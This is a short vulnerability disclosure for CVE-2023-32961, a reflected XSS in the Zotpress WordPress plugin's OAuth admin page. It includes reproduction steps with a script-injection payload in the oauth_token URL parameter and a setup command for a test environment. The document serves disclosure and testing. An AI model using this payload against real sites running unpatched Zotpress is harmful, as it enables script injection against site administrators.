CVE-2023-32961 Analysis

Component details

Component name


Vulnerable version

≤ 7.3.3

Component slug




Vulenerability details

Short description

get_request_token function in zotpress/lib/admin/admin.accounts.oauth.php is vulnerable to a XSS attack.

How to reproduce (PoC)

  1. Install the oauth php extension to trigger the vulnerability. (This is Zotpress’s optional)
  2. Login to
  3. Conditions must be met for the get_request_token function to execute. (first time only) Send a payload like this: http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token=1
  4. Send a below payload http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token="><script>alert(1)</script>

Additional information

  • You need a account.
  • You need to set the oauthState value to 1 to trigger it. If the above payload doesn’t work, you need to find a way to set oauthState to 1.
    • conditional expression :

php $_GET['oauth_token'] != $state['request_token_info']['oauth_token']

  • Easy to install php oauth extension:
    • One Line Command :

shell sudo su; apt-get update; apt-get -y install gcc make autoconf libc-dev pkg-config libpcre3-dev; pecl install oauth; bash -c "echo > $PHP_INI_DIR/conf.d/oauth.ini"; service apache2 restart

  • Tested in wordpress:latest Docker image.

PoC Video



This post is licensed under CC BY 4.0 by the author.